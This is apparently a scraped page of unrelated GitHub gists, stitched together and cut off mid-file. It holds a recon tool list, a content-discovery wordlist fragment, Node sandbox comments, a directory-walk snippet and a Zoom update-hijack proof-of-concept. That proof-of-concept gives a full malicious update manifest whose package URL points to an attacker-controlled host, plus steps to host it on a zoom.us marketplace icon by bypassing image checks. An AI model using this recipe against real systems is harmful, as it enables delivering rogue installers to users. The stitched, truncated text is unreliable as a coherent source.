- https://github.com/projectdiscovery/subfinder – a subdomain discovery tool
- https://github.com/owasp-amass/amass – asset discovery
- https://github.com/nmap/nmap – port enumiration
- https://github.com/projectdiscovery/httpx – HTTP toolkit (server discovery)
- https://github.com/tomnomnom/waybackurls – discover known URLs from Wayback Machine
- https://github.com/lc/gau – discover known URLs from Wayback Machine and so on
- https://github.com/trufflesecurity/trufflehog – secrets detection
- https://github.com/projectdiscovery/nuclei – known vulnerabilities
- https://github.com/ffuf/ffuf + https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content – discover hidden folders
- https://github.com/OJ/gobuster – discover hidden folders
Kirill Kirill89
POC - https://youtu.be/zGSLBDo3N7s
- Create a malicious update manifest with the
Package-urlpointing a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
- Upload the manifest it to a
.zoom.usdomain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg
nullenc0de
/ content_discovery_nullenc0de.txt
Last active
May 8, 2024 18:22
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 | |
| /0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //////// | |
| // The vm module lets you run a string containing javascript code 'in | |
| // a sandbox', where you specify a context of global variables that | |
| // exist for the duration of its execution. This works more or less | |
| // well, and if you're in control of the code that's running, and you | |
| // have a reasonable protocol in mind// for how it expects a certain | |
| // context to exist and interacts with it --- like, maybe a plug-in | |
| // API for a program, with some endpoints defined for it that do | |
| // useful domain-specific things --- your life can go smoothly. |
lovasoa
/ node-walk.es6
Last active
May 10, 2024 05:30
Walk through a directory recursively in node.js.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ES6 version using asynchronous iterators, compatible with node v10.0+ | |
| const fs = require("fs"); | |
| const path = require("path"); | |
| async function* walk(dir) { | |
| for await (const d of await fs.promises.opendir(dir)) { | |
| const entry = path.join(dir, d.name); | |
| if (d.isDirectory()) yield* walk(entry); | |
| else if (d.isFile()) yield entry; |